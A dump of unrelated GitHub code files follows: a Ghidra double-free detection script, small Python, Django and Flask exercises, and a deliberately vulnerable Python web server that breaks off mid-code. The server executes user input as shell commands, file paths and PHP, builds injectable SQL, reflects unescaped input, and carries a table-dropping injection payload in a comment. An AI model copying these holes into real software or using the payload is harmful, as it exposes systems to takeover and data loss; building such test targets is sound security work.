y_train_scaled[i:nb_data]\n# print(i)\n# print(x.shape, y.shape)\n model.train_on_batch(x, y)\n\n ## To calculate the forecasting performance\n y_pred_train = sc.inverse_transform(model.predict(x_train_scaled))\n loss_train = tf.reduce_mean(tf.square(y_train - y_pred_train)).numpy()\n accuracy_train = tf.reduce_sum(tf.cast(tf.less_equal(tf.abs(y_train - y_pred_train), 1000), dtype = tf.float32)).numpy()/y_train.shape[0]\n\n y_pred_test = sc.inverse_transform(model.predict(x_test_scaled))\n loss_test = tf.reduce_mean(tf.square(y_test - y_pred_test)).numpy()\n accuracy_test = tf.reduce_sum(tf.cast(tf.less_equal(tf.abs(y_test - y_pred_test), 1000), dtype = tf.float32)).numpy()/y_test.shape[0]\n\n epoch_performance = pd.DataFrame({\n \"Loss_train\":loss_train,\n \"Accuracy_train\":accuracy_train,\n \"Loss_test\":loss_test,\n \"Accuracy_test\":accuracy_test\n },index=[0])\n\n performance_indicator = performance_indicator.append(epoch_performance,ignore_index=True)\n print(\"Epoch: %d, Loss: %.2f, Accuracy_train: %.2f%%, Accuracy_test: %.2f%%\"%(e,loss_train,accuracy_train*100,accuracy_test*100))\n print(\"-\"*50)\n\n\n if(loss_train <= minimum_loss):\n minimum_loss = loss_train\n current_times=0\n model.save_weights(\"model_weight.h5\")\n Network.set_model(model)\n\n else:\n current_times += 1\n if (e>=epoch-1):\n Network.set_model(model)\n \n Network.performance_indicator = performance_indicator\n \n \n y_pred_test = sc.inverse_transform(model.predict(x_test_scaled))\n loss_test = tf.reduce_mean(tf.square(y_test - y_pred_test)).numpy()\n accuracy_test = tf.reduce_sum(tf.cast(tf.less_equal(tf.abs(y_test - y_pred_test), 1000), dtype = tf.float32)).numpy()/y_test.shape[0]\n\n Network.y_true = y_test\n Network.y_predict = y_pred_test\n \n return accuracy_test \n\n\n# In[11]:\n\n\n# \"\"\"Class that represents the network to be evolved.\"\"\"\n# import random\n# import logging\n\n\n# In[12]:\n\n\n# class Network():\n# \"\"\"Represent a network and let us operate on it.\n\n# Currently only works for an MLP.\n# \"\"\"\n\n# def __init__(self, nn_param_choices=None):\n# \"\"\"Initialize our network.\n\n# Args:\n# nn_param_choices (dict): Parameters for the network, includes:\n# 'window_size':[i for i in range(1,50)]\n# 'nb_neurons': [i for i in range(3, 41, 1)],\n# 'nb_layers': [i for i in range(1,11)],\n# 'batch_size':[i for i 
in range(1,21)],\n# 'epoch':[i for i in range(10,501)],\n# 'optimizer': ['rmsprop', 'adam', 'sgd', 'adagrad',\n# 'adadelta', 'adamax', 'nadam','ftrl'],\n# \"\"\"\n# self.accuracy = 0.\n# self.nn_param_choices = nn_param_choices\n# self.network = {} # (dic): represents MLP network parameters\n# self.model = None\n# self.performance_indicator = None\n# self.y_true = None\n# self.y_predict = None\n \n# def create_random(self):\n# \"\"\"Create a random network.\"\"\"\n# for key in self.nn_param_choices:\n# self.network[key] = random.choice(self.nn_param_choices[key])\n\n# def create_set(self, network):\n# \"\"\"Set network properties.\n\n# Args:\n# network (dict): The network parameters\n\n# \"\"\"\n# self.network = network\n\n# def train(self):\n# \"\"\"Train the network and record the accuracy.\n\n# Args:\n# dataset (str): Name of dataset to use.\n\n# \"\"\"\n# if self.accuracy == 0.:\n# self.accuracy = train_and_score(self)\n\n# def set_model(self, trained_model):\n# self.model = trained_model\n \n# def plot_learning_graph (self):\n \n# fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(15, 5), dpi=80, facecolor=\"w\", edgecolor=\"k\")\n\n# data = self.performance_indicator\n# for i in range(0,2):\n# ax = axes[i]\n\n# train = data.iloc[:,i]\n# test = data.iloc[:,i+2]\n\n# ax.plot(train, label=\"Train\")\n# ax.plot(test, label=\"Test\")\n# ax.legend()\n# ax.set_xlabel(\"epoch\")\n\n# if i==0:\n# ax.set_title(\"Loss\")\n# ax.set_ylabel(\"Loss\")\n# else:\n# ax.set_title(\"Accuracy\")\n# ax.set_ylabel(\"Accuracy\")\n\n# ax.ticklabel_format(style='plain', useOffset=False, axis='both')\n\n# plt.tight_layout()\n \n \n# def plot_prediction_value(self):\n \n# fig, axes = plt.subplots(figsize=(15, 5), dpi=80, facecolor=\"w\", edgecolor=\"k\")\n\n# axes.plot(self.y_true, label=\"Actual\")\n# axes.plot(self.y_predict, label=\"Prediction\")\n# axes.legend()\n# axes.set_xlabel(\"Sample index(Weekly)\")\n# axes.set_ylabel(\"Changjiang Copper Spot Price $CNY/ton\")\n# axes.set_title(\"Actual data and predicted data comparison\")\n# axes.ticklabel_format(style='plain', useOffset=False, axis='both')\n\n# plt.tight_layout()\n \n# def print_network(self):\n# \"\"\"Print out a network.\"\"\"\n# logging.info(self.network)\n# logging.info(\"Network accuracy: %.2f%%\" % (self.accuracy * 100))\n\n\n# In[13]:\n\n\n# nn_param_choices = {\n \n# 'window_size':[20],\n# 'batch_size':[i for i in range(4,9)],\n# 'nb_neurons': [i for i in range(3, 41, 1)],\n# 'nb_layers': [i for i in range(1,11)],\n# 'optimizer': ['rmsprop', 'adam', 'sgd', 'adagrad',\n# 'adadelta', 'adamax', 'nadam','ftrl']\n# }\n\n# network = Network(nn_param_choices)\n# network.create_random()\n\n\n# In[14]:\n\n\n# network.network\n\n\n# In[15]:\n\n\n# network.train()\n\n\n# In[16]:\n\n\n# network.plot_learning_graph()\n\n\n# In[17]:\n\n\n# network.plot_prediction_value()\n\n","repo_name":"AlstonYang/MW-GA-GRU","sub_path":".ipynb_checkpoints/train-checkpoint.py","file_name":"train-checkpoint.py","file_ext":"py","file_size_in_byte":11849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23492304530","text":"# Checks the program for Double Free Vulnerabilities in Windows x64 Applications\n\n'''\nThings to add/work on for tracing: \n\nIndirect function calls/function pointer\nhttps://www.diffchecker.com/qdoX8gc5\nhttps://www.geeksforgeeks.org/function-pointer-in-c/\n\nRDI in free() being assigned via XCHG instruction\n'''\n\nprogram_name = currentProgram.getName()\nprint(\"Searching {} for Double 
Free issues...\\n\".format(program_name))\n\nDYNAMIC = 4194304\nADDRESS = 8192\nDYNAMIC_ADDRESS = DYNAMIC + ADDRESS # This is a ptr memory address like MOV qword ptr [RSP + 0x20], R14\n\n'''\nUtilizes the relocation table within the executable to locate the free function.\nBecause it's a relocation, we need to grab the reference to find the real jump table.\nReturns array of all free() addresses from the reloctable.\n'''\ndef grabLinuxFreeFunctions():\n reloc_table = currentProgram.getRelocationTable()\n relocs = reloc_table.getRelocations()\n \n free_function_list = []\n while relocs.hasNext():\n rel = relocs.next()\n if rel.getSymbolName() == \"free\":\n free_reloc_addr = rel.getAddress()\n refs = getReferencesTo(free_reloc_addr)\n for ref in refs:\n free_addr = ref.getFromAddress()\n free_function_list.append(getFunctionAt(free_addr))\n return free_function_list\n\n'''\nUtilizes the symbol table within the executable to locate the free function. \nReturns array of all free() addresses from the symtable (including any jump table stuff)\n'''\ndef grabWindowsFreeFunctions(): \n symbol_table = currentProgram.getSymbolTable()\n free_symbols = symbol_table.getExternalSymbols(\"free\")\n\n free_function_list = []\n while free_symbols.hasNext():\n sym = free_symbols.next()\n free_function_list.append(getFunctionAt(sym.getAddress()))\n \n return free_function_list\n \n \n'''\nInput: array of functions\nObtains all reference calls to the functions provided in the list. \nReturns an array of dictionaries.\n''' \ndef listRefCalls(function_list):\n call_info_list = []\n for function in function_list:\n func_entry = function.getEntryPoint()\n refs = getReferencesTo(func_entry)\n for ref in refs:\n if ref.getReferenceType().isCall():\n call_addr = ref.getFromAddress()\n try:\n call_func = getFunctionContaining(call_addr).getName()\n call_addr_offset = call_addr.getOffset()\n call_info = {\n 'address': call_addr,\n 'function': call_func,\n 'offset': call_addr_offset\n }\n call_info_list.append(call_info)\n except:\n print('Failed to find function for XREF at {}, skipping.'.format(call_addr))\n continue\n return call_info_list\n\n'''\nThis function calculates the stack offset caused by a CALL instruction (and general stack movement).\n\n# Need to add a tracking function for Stack stuff.\nSince we're going backwards we will see something like MOV RBP, qword ptr [RSP + 0xa0]\nWe gotta track all stack changes so we know where the stack is and what parameter it is\nSUB RSP, 0x50 -> -0x50 (80)\nADD RSP, 0x10 -> +0x10 (16)\nPUSH REG -> -0x8 (8)\nPOP REG -> +0x8 (8)\nStart of the function? -0x8 b/c a call always adds the return address to the stack to make sure it can get back.\n\nDoing all this will give us our RSP+0xZZ value we need to search for in other functions.\n'''\ndef traceStackParameters(current_instr):\n stack_offset = int(current_instr.getInputObjects()[0].getValue())\n while True:\n if current_instr.getAddress() == getFunctionContaining(current_instr.getAddress()).getEntryPoint():\n if current_instr.getMnemonicString() == \"PUSH\":\n stack_offset -= 16 # To account for return value caused by CALL and PUSH\n elif current_instr.getMnemonicString() != \"POP\":\n stack_offset -= 8 # Account for just the return, If for WHATEVER reason there is a POP, then the offset would cancel eachother out so no need to add or subtract. 
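For example, with a prologue of PUSH RBP; SUB RSP,0x30, a slot written at [RSP + 0x40] resolves to 0x40 - 0x30 - 0x10 = 0x0, i.e. [RSP] at the CALL site in the caller.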
\n return stack_offset\n elif current_instr.getMnemonicString() == \"SUB\" and str(current_instr.getInputObjects()[0] == \"RSP\"):\n scalar_value = int(current_instr.getInputObjects()[1].getValue()) # Returns the scalar for the instruction, ex: SUB RSP, 0x50\n stack_offset -= scalar_value\n elif current_instr.getMnemonicString() == \"ADD\" and str(current_instr.getInputObjects()[0] == \"RSP\"):\n scalar_value = int(current_instr.getInputObjects()[1].getValue()) # Returns the scalar for the instruction, ex: ADD RSP, 0x\n stack_offset += scalar_value\n elif current_instr.getMnemonicString() == \"PUSH\":\n stack_offset -= 8\n elif current_instr.getMnemonicString() == \"POP\":\n stack_offset += 8\n current_instr = current_instr.getPrevious()\n\n'''\nGrabs all references for the current function, and begins an inter function trace for each\nstarting at the instruction prior to the initial referenced call.\nThis will get called everytime a trace hits the top of a function.\n'''\ndef traceExterCallInstructions(inter_trace, stack_ops=None):\n # Just grab the last value in the array to get the earliest instruction in the function.\n earliest_instr = inter_trace[-1]\n current_function = getFunctionContaining(earliest_instr.getAddress())\n \n # Grab the references for the function\n raw_func_refs = listRefCalls([current_function])\n \n # Check if the trace is unsuccessful because it hit the entry of the program.\n if not raw_func_refs:\n print(\"Failed to trace through calls, scanned all the way to entry.\")\n return None\n else:\n func_refs = []\n for ref in raw_func_refs:\n if ref['function'] != current_function.getName(): # We gotta remove any instances of recursion to not waste time.\n func_refs.append(ref)\n \n for ref in func_refs:\n if stack_ops: # If we got stack operations we assign them as the \"target_register\" just to keep everything consistent\n target_register = stack_ops\n else:\n target_register = earliest_instr.getOpObjects(1)\n target_register = [str(i) for i in target_register]\n start_instr = getInstructionAt(ref['address']) # The start instr will be the initial call, but we will be searching starting prior to it.\n ntrace = inter_trace + [start_instr]\n return traceInterFuncInstructions(start_instr.getPrevious(), target_register, False, ntrace, 10) # We're setting a max count of 10 for the initial instruction so we dont get a FP. This can be adjusted.\n\n\n'''\nRuns through the MOV instructions until it gets to the RAX source.\nat that point it grabs the CALL preceeding it. 
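(That CALL is taken to be the *alloc whose return value in RAX seeded the register chain being traced.)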
\nIt traces the stack if it hits a DYNAMIC_ADDRESS (pointer MOV) and is RSP, \nand traces external function references/calls to find what it needs to find.\n\nReturns an array containing all MOV and CALL instructions in the trace.\n'''\ndef traceInterFuncInstructions(current_instruction, target_register, return_check, trace_arr=[], max_count=100):\n call_trace = trace_arr\n count = 0\n while True:\n count += 1\n # Gotta first check if we found the *alloc call we're looking for via the return_check.\n if return_check:\n if current_instruction.getMnemonicString() == \"CALL\":\n call_trace.append(current_instruction)\n return call_trace\n else:\n # We need to check if we're at the start of a function, obvious can't be reliably tracing if we have no idea where we are.\n if current_instruction.getAddress() == getFunctionContaining(current_instruction.getAddress()).getEntryPoint():\n if not call_trace:\n print('Failed to trace instructions within the function.')\n return None\n call_trace = traceExterCallInstructions(call_trace)\n return call_trace # Due to recursion, we will hit the CALL return, allowing us to also return here. \n elif current_instruction.getMnemonicString() == \"MOV\": # We're only watching register changes from MOV\n src_value = current_instruction.getOpObjects(0) # Bc we're going backwards in instructions, the src is really the result object\n src_value = [str(i) for i in src_value] # Need them to all be strings\n if src_value == target_register:\n call_trace.append(current_instruction)\n operand_type = current_instruction.getOperandType(1) # Used to check if we're dealing with a stack value\n dst_value = current_instruction.getOpObjects(1) # Bc we're going backwards in instructions, the dst is really the input object\n dst_value = [str(i) for i in dst_value] # Need them to all be strings\n # We need to check if the value is on the stack, so we have to track it through stack changes.\n if operand_type == DYNAMIC_ADDRESS:\n if dst_value[0] == 'RSP': # If it's RSP we're dealing with changes to the current stack, which is an indicator it's being called from a function.\n stack_offset = traceStackParameters(current_instruction)\n stack_ops = [dst_value[0],str(hex(stack_offset))] # Needs to look like ['RSP', '0x8']\n call_trace = traceExterCallInstructions(call_trace, stack_ops)\n return call_trace\n else: # Really only if it's RBP, which is an indicator that the value is simply being stored on the stack near the base pointer.\n return traceInterFuncInstructions(current_instruction.getPrevious(), dst_value, False, call_trace)\n \n else:\n if dst_value == ['RAX']: # We've found the return source, just need to find the call.\n return traceInterFuncInstructions(current_instruction.getPrevious(), dst_value, True, call_trace)\n else:\n return traceInterFuncInstructions(current_instruction.getPrevious(), dst_value, False, call_trace)\n if count == max_count: # Setting the max count so that we dont get any FPs for the exter-func trace.\n print('Failed to find any more register tracings within {} instructions.'.format(str(count)))\n break\n current_instruction = current_instruction.getPrevious()\n\n \n'''\nLoops through all free references and traces them all the way to the *alloc call.\nReturns an array of arrays of each full instruction trace.\n'''\ndef obtainAllFunctionTraces(fcall_info_list, target_reg):\n full_trace_list = [] # An array of arrays containing all traces instructions from *alloc to Free.\n for call_info in fcall_info_list:\n trace_array = []\n func_call_instr = 
getInstructionAt(call_info['address'])\n trace_array.append(func_call_instr)\n\n current_instruction = func_call_instr\n count = 0\n # We're going to loop through until we find the first instruction that is the first parameter of the free() call.\n while True:\n count += 1\n if current_instruction.getMnemonicString() == \"MOV\": # getResultObjects checks if the src has an address or register (so no scalars)\n src_value = current_instruction.getOpObjects(0) # Bc we're going backwards in instructions, the src is really the result object\n src_value = [str(i) for i in src_value] # Need them to all be strings\n if src_value == target_reg: # The first source value will be the first parameter of the specified architecture/os\n dst_value = current_instruction.getOpObjects(1) # Bc we're going backwards in instructions, the dst is really the input object\n dst_value = [str(i) for i in dst_value] # Need them to all be strings\n trace_array.append(current_instruction)\n call_trace = traceInterFuncInstructions(current_instruction, dst_value, False, []) # We then need to trace all the way back to the source *alloc call.\n # Verify that the trace was successful or not.\n if not call_trace:\n print(\"Trace unsuccessful for {}: {}, skipping.\".format(trace_array[0].getAddress(), trace_array[0]))\n else:\n trace_array = trace_array + call_trace \n trace_array = trace_array[::-1] # Reverse it so the *alloc call is the first in the array (because confusing otherwise).\n full_trace_list.append(trace_array) \n break\n if count == 100:\n break\n current_instruction = current_instruction.getPrevious()\n return full_trace_list\n\n\n'''\nenumerates a list for duplicates of a specific item.\n'''\ndef indices(lst, item):\n return [i for i, x in enumerate(lst) if x == item]\n\n\n'''\nChecks the traces for double free issues by matching the *alloc handles for any duplicates.\nReturns dictionary with the dict value containing the vuln traces.\n'''\ndef checkForDoubleFree(full_trace_list):\n mem_addr_list = []\n for trace_list in full_trace_list:\n mem_addr_list.append(trace_list[0].getAddress())\n \n # We're now going to look for any duplicate memory addresses as that proves a specific *alloc handle is being freed twice.\n raw_dupes_dict = dict((x, indices(mem_addr_list, x)) for x in set(mem_addr_list) if mem_addr_list.count(x) > 1)\n double_free_vulns = {}\n for dupe_addr in raw_dupes_dict.keys():\n vuln_traces = []\n for index in raw_dupes_dict[dupe_addr]:\n vuln_traces.append(full_trace_list[index])\n double_free_vulns[dupe_addr] = vuln_traces\n return double_free_vulns\n\n\n'''\nReturns simple dictionary of formatted call to provide external reference name and symbol name.\n'''\ndef getCallInformation(call_instr):\n call_ptr_addr = call_instr.getOpObjects(0)[0]\n if getReferencesFrom(call_ptr_addr):\n ext_ref_name = getReferencesFrom(call_ptr_addr)[0]\n else:\n ext_ref_name = None\n sym_name = getSymbolAt(call_ptr_addr)\n \n call_info_dict = {\n 'ext_ref_name': ext_ref_name,\n 'sym_name': sym_name\n }\n return call_info_dict\n\n\n'''\nFormats/prints what was returned from checkForDoubleFree()\n'''\ndef formatVulnOutput(vuln_dict):\n for vuln in vuln_dict.keys():\n alloc_instr = getInstructionAt(vuln)\n alloc_info = getCallInformation(alloc_instr)\n print(\"POTENTIAL DOUBLE FREE VULN USING HANDLE ({}): {} ; {} / {}\".format(alloc_instr.getAddress(), alloc_instr, alloc_info['sym_name'], alloc_info['ext_ref_name']))\n print(\"-------------\")\n for trace in vuln_dict[vuln]:\n for instr in trace:\n if 
instr.getMnemonicString() == \"CALL\":\n call_infos = getCallInformation(instr)\n if call_infos['ext_ref_name']:\n print(\"{}: {} ; {} / {}\".format(instr.getAddress(), instr, call_infos['sym_name'], call_infos['ext_ref_name']))\n else:\n print(\"{}: {} ; {}\".format(instr.getAddress(), instr, call_infos['sym_name']))\n else:\n print(\"{}: {}\".format(instr.getAddress(), instr))\n print('')\n\n\n'''\nFancy main function.\n'''\ndef main():\n # Has to be 64bit\n if str(currentProgram.getLanguageID()) != \"x86:LE:64:default\":\n print(\"Architecture not supported.\")\n return 0\n\n os_type = str(currentProgram.getExecutableFormat())\n # If it's Windows, we need to grab free() differently, and set the first register to RCX due to calling convention\n if os_type == \"Portable Executable (PE)\":\n free_list = grabWindowsFreeFunctions()\n target_reg = ['RCX']\n \n # If it's Linux, we need to grab free() differently, and set the first register to RDI due to calling convention \n elif os_type == \"Executable and Linking Format (ELF)\":\n free_list = grabLinuxFreeFunctions()\n target_reg = ['RDI']\n else:\n print(\"Unknown/Unsupported OS.\")\n return 0\n \n if not free_list:\n print('No symbols for free() were identified.')\n return 0\n\n fcall_info_list = listRefCalls(free_list) # An array of dictionaries containing address, function name, and offset of all free reference calls\n full_trace_list = obtainAllFunctionTraces(fcall_info_list, target_reg)\n \n vuln_dict = checkForDoubleFree(full_trace_list)\n \n if vuln_dict:\n formatVulnOutput(vuln_dict)\n else:\n print('No potential double free vulnerabilities were identified.')\n\n \nif __name__ == '__main__':\n main()\n","repo_name":"AutomoxSecurity/ghidra-double-free-check","sub_path":"DoubleFreeChecker.py","file_name":"DoubleFreeChecker.py","file_ext":"py","file_size_in_byte":17070,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"20889011211","text":"# visit this website\n# https://reeborg.ca/reeborg.html?lang=en&mode=python&menu=worlds%2Fmenus%2Freeborg_intro_en.json&name=Maze&url=worlds%2Ftutorial_en%2Fmaze1.json\n\n# factorial\n\ndef factorial(a):\n fact = 1\n for i in range(1, a+1):\n fact = fact*i\n return(fact)\n\n\nn = int(input(\"Please enter the number: \\n\"))\nprint(f\"Factorial of {n} is {factorial(n)}\")\n\n\nprint(\"===========================\")\nprint(\"finding factorial using recursion\")\n\n\ndef rec_fact(b):\n if b == 1:\n return b\n else:\n return b*rec_fact(b-1)\n\n\nc = int(input(\"Please enter the number: \\n\"))\nprint(f\"Factorial of {c} using recurssion is {rec_fact(c)}\")\n","repo_name":"ishikkkkaaaa/100-PYTHON-PROJECT","sub_path":"Day 6- Factorial/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"72"} +{"seq_id":"22985766765","text":"from dataclasses import field\nfrom statistics import mode\nfrom rest_framework import serializers\nfrom .models import Task\nfrom django.contrib.auth.models import User\nclass TaskSerializer(serializers.ModelSerializer):\n class Meta:\n model=Task\n fields=('id', 'title', 'description', \n 'create_date', 'author_id', 'is_done')\n\n\n\nclass CreateTaskSerializer(serializers.ModelSerializer):\n class Meta:\n model=Task\n fields=('title', 'description')\n extra_kwargs = {'title': {'required': True},\n 'description': {'required': True}} \n\n\n\n def create(self, request, token):\n val_data=request.data\n author= 
User.objects.filter(auth_token=token).first()\n        try:\n            task=Task.objects.create(title=val_data['title'],\n                                     description=val_data['description'],\n                                     author_id=author)\n        except:\n            return None\n        task.save()\n        return task","repo_name":"YaridTheBoi/ToDoPlus","sub_path":"to_do_plus/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42790687234","text":"try:\n    from flask import Flask\n    from flask_restful import Resource, Api\n\n    from flask_limiter.util import get_remote_address\n    from flask_limiter import Limiter\n\n    from flasgger import Swagger\n    from flasgger.utils import swag_from\n    from flask_restful_swagger import swagger\n\nexcept Exception as e:\n    print('There are some missing modules: {}'.format(e))\n\napp = Flask(__name__)\napi = Api(app)\n\nlimiter = Limiter(app, key_func=get_remote_address)\nlimiter.init_app(app)\n\napi = swagger.docs(Api(app), apiVersion='0.1', api_spec_url='/docs')\n\ndata = []\n\nclass HelloWorld(Resource):\n\n    decorators=[limiter.limit(\"100/days\")]\n    @swagger.model\n    @swagger.operation(notes='some really good notes')\n\n    def __init__(self):\n        pass\n\n    def get(self, name):\n        if len(data) == 0:\n            return {\n                'Response': 200,\n                'Data': 'Null'\n            }\n        return {\n            'Response': 200,\n            'Data': data\n        }\n\n    def post(self, name):\n        temp= {'Name': name}\n        data.append(temp)\n        return {\n            'Response': 201,\n            'Data': 'Added data with name {}'.format(name)\n        }\n\n    def delete(self, name):\n        for ind,x in enumerate(data):\n            if x['Name'] == name:\n                temp = data.pop(ind)\n                return {\n                    'Response': 202,\n                    'Note':'Deleted'\n                }\n\napi.add_resource(HelloWorld, '/name/<string:name>')\nif __name__ == \"__main__\":\n    app.run(debug=True)","repo_name":"yodji09/training-Python","sub_path":"restApi/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"28935729258","text":"from django.shortcuts import render\n\n# Create your views here.\nfrom .models import HeroInfo\nfrom django.core.paginator import Paginator\n\n\n# Pagination exercise from test5. Approach 1: request a URL that carries the page number directly\n# def herolist(request, page_num=1):\n#     hero_list = HeroInfo.objects.all()\n#     paginator = Paginator(hero_list, per_page=5)\n#     page = paginator.page(page_num)\n#     context = {'page': page}\n#     return render(request, 'booktest/herolist.html', context=context)\n\n\n# Pagination exercise from test5. Approach 2: pass the page number in a GET parameter (only one URL pattern needs to be defined in urls)\ndef herolist(request):\n    a = request.GET.get('a', 1)\n    hero_list = HeroInfo.objects.all()\n    paginator = Paginator(hero_list, per_page=5)  # split the records into pages of 5\n    page = paginator.page(a)  # fetch the data of page a (a collection)\n    context = {\n        'page1': page,\n        'current_page_num': a}\n    return render(request, 'booktest/herolist.html', context=context)\n","repo_name":"Mrfranken/djangostudying","sub_path":"test2/booktest/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"10255906667","text":"import http.server\r\nfrom urllib.parse import urlparse\r\nfrom urllib.parse import parse_qs\r\nimport os, sys\r\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\r\nimport socketserver\r\nimport pathlib\r\nimport mysql.connector\r\nimport traceback\r\nimport subprocess\r\n\r\nclass serverResponse(BaseHTTPRequestHandler):\r\n\r\n    
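# NOTE: this handler intentionally exposes vulnerable endpoints (SQL injection, XSS, file inclusion, command and PHP injection) so scanners can be benchmarked against it -- never run it outside an isolated test environment.\r\n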
########################################################################################################################################\r\n    #Variables\r\n    \r\n    Error_Page = \"\\\r\n                 <html>\\\r\n                 <body>\\\r\n                 <h1>Error accessing {path}</h1>\\\r\n                 <p>{msg}</p>\\\r\n                 </body>\\\r\n                 </html>
    \\\r\n \\\r\n \"\r\n mydb = \"\"\r\n \r\n sql_dynamic_content = [\" .34.s.2 \", \" .34.s.2 \"]\r\n currWorkingDir = os.path.abspath(os.getcwd())\r\n \r\n ########################################################################################################################################\r\n #Constructor\r\n \r\n try:\r\n mydb = mysql.connector.connect(host=\"localhost\", user=\"httpUser\", password=\"simpleP4ssPhrase4Testing\", database=\"htmlDB\")\r\n print(\"DB htmlDB connected\")\r\n except Exception as excep:\r\n mydb = mysql.connector.connect(host=\"localhost\", user=\"httpUser\", password=\"simpleP4ssPhrase4Testing\")\r\n dbcursor = mydb.cursor()\r\n dbcursor.execute(\"CREATE DATABASE htmlDB\")\r\n print(\"DB htmlDB created\")\r\n \r\n dbcursor = mydb.cursor(buffered=True)\r\n try:\r\n dbcursor.execute(\"CREATE TABLE htmlInput (id INT AUTO_INCREMENT PRIMARY KEY, input TEXT)\")\r\n print(\"Table htmlInput created\")\r\n except mysql.connector.errors.ProgrammingError as pe:\r\n print(\"Table probably already existed\")\r\n except Exception as excep:\r\n traceback.print_exc()\r\n \r\n ########################################################################################################################################\r\n #Functions\r\n \r\n def do_OPTIONS(self): \r\n self.send_response(200, \"ok\") \r\n self.send_header('Access-Control-Allow-Origin', '*') \r\n self.send_header('Access-Control-Allow-Methods', 'GET, POST, OPTIONS')\r\n self.send_header(\"Access-Control-Allow-Headers\", \"X-Requested-With\")\r\n \r\n \r\n def do_GET(self):\r\n try:\r\n \r\n #print(\"workingDir: \", currWorkingDir)\r\n #print(self.path)\r\n full_path = os.path.join(self.currWorkingDir, self.path.replace(\"/\", \"\")) #.replace(\"/\", \"\\\\\")\r\n #print(full_path)\r\n url_comp = urlparse(self.path)\r\n query_comp = parse_qs(urlparse(self.path).query)\r\n \r\n # It doesn't exist...\r\n if not os.path.exists(full_path):\r\n #print(\"received: \", self.path)\r\n #print(\"url_comp: \", url_comp)\r\n #print(\"query_comp: \", query_comp)\r\n \r\n #Check if its input from sqlinjection.html odr fileInclusion.html\r\n if url_comp.path == '/sqlinjection.html':\r\n self.handle_sqlInjection_page(query_comp)\r\n elif url_comp.path == '/fileinclusion.html':\r\n self.handle_fileInclusion_page(query_comp)\r\n elif url_comp.path == '/cmdinjection.html':\r\n self.handle_cmdInjection_page(query_comp)\r\n elif url_comp.path == '/phpinjection.html':\r\n self.handle_phpInjection_page(query_comp)\r\n elif url_comp.path == '/xss.html':\r\n self.handle_xss_page(query_comp)\r\n else:\r\n #self.handle_file(os.path.join(os.path.abspath(os.getcwd()), \"value.html\"), self.path)\r\n raise Exception(\"Path \" + full_path + \" not found\")\r\n # ...it's a file...\r\n elif os.path.isfile(full_path):\r\n if url_comp.path == '/sqlinjection.html':\r\n self.handle_file(full_path, self.sql_dynamic_content)\r\n else:\r\n self.handle_file(full_path)\r\n # ...it's something we don't handle.\r\n else:\r\n if self.path == '/':\r\n self.handle_file(os.path.join(os.path.abspath(os.getcwd()), \"index.html\"), self.path)\r\n else:\r\n raise Exception(\"Unknown object: \"+ full_path)\r\n\r\n # Handle errors.\r\n except Exception as msg:\r\n print(\"Error occured: \\n\", msg)\r\n traceback.print_exc()\r\n self.handle_error(msg)\r\n\r\n #Handle the input from page xss.html\r\n #writes back the input from form \r\n def handle_xss_page(self, query_comp):\r\n output = [query_comp[\"xss\"][0]]\r\n print(\"Output: \", output)\r\n 
self.handle_file(os.path.join(os.path.abspath(os.getcwd()), \"xss.html\"), output )\r\n\r\n #Handle the input from page phpinjection.html\r\n #Directly executes phpi.php with the given input as parameter\r\n def handle_phpInjection_page(self, query_comp):\r\n #command = \"php -f \" + os.path.join(self.currWorkingDir, \"phpi.php\") + \" phpi=\\\"\" + query_comp[\"phpi\"][0] +\"\\\"\"\r\n #command = command.replace(\"\\\\\", \"\\\\\\\\\")\r\n command = \"php -f phpi.php phpi=\\\"\" + query_comp[\"phpi\"][0] +\"\\\"\"\r\n print(\"Command: \", command)\r\n res = subprocess.run(command, shell=True, stdout=subprocess.PIPE)\r\n output = [\"PHP executed: \\n\"+res.stdout.decode(\"utf-8\")]\r\n print(\"Output: \", output)\r\n self.handle_file(os.path.join(os.path.abspath(os.getcwd()), \"phpinjection.html\"), output )\r\n \r\n #Handle the input from page cmdinjection.html\r\n #Directly executes the code given by the input in shell\r\n def handle_cmdInjection_page(self, query_comp):\r\n command = subprocess.run(query_comp[\"cmdi\"][0], shell=True, capture_output=True)\r\n output = [\"Command executed: \"+command.stdout.decode(\"utf-8\")]\r\n print(\"Output: \", output)\r\n self.handle_file(os.path.join(os.path.abspath(os.getcwd()), \"cmdinjection.html\"), output )\r\n \r\n #Handle the input from page fileInclusion.html\r\n #Enables Directory Traversal and Remote and Local file inclusion by executing the given file\r\n def handle_fileInclusion_page(self, query_comp):\r\n filePath = query_comp['fi'][0]\r\n res = subprocess.run(filePath, shell=True, stdout=subprocess.PIPE)\r\n output = [\"File executed: \"+filePath+ \"; Result: \"+ res.stdout.decode(\"utf8\")]\r\n self.handle_file(os.path.join(os.path.abspath(os.getcwd()), \"fileinclusion.html\"), output )\r\n\r\n # Handle the input from page sqlinjection.html\r\n # Exploit input: '; drop table htmlInput; select * from htmlInput where input = '\r\n def handle_sqlInjection_page (self, query_comp):\r\n if 'sql_insert' in query_comp:\r\n sql = \"INSERT INTO htmlInput (input) VALUES (%s)\"\r\n val = (query_comp['sql_insert'][0],)\r\n self.dbcursor.execute(sql, val)\r\n self.mydb.commit()\r\n self.dbcursor.execute(\"SELECT * FROM htmlInput\")\r\n result = self.dbcursor.fetchall()\r\n self.sql_dynamic_content[1] = \".\"\r\n self.sql_dynamic_content[0] = result\r\n for res in result:\r\n print(\"Result insert: \", res)\r\n else:\r\n sql = \"select * from htmlInput where input = '\" + query_comp['sql'][0] + \"'\"\r\n print(\"Injection String: \", sql)\r\n results = self.dbcursor.execute(sql, multi=True)\r\n result = []\r\n for res in results:\r\n print(\"Executed command: \", res)\r\n if res.with_rows:\r\n result += 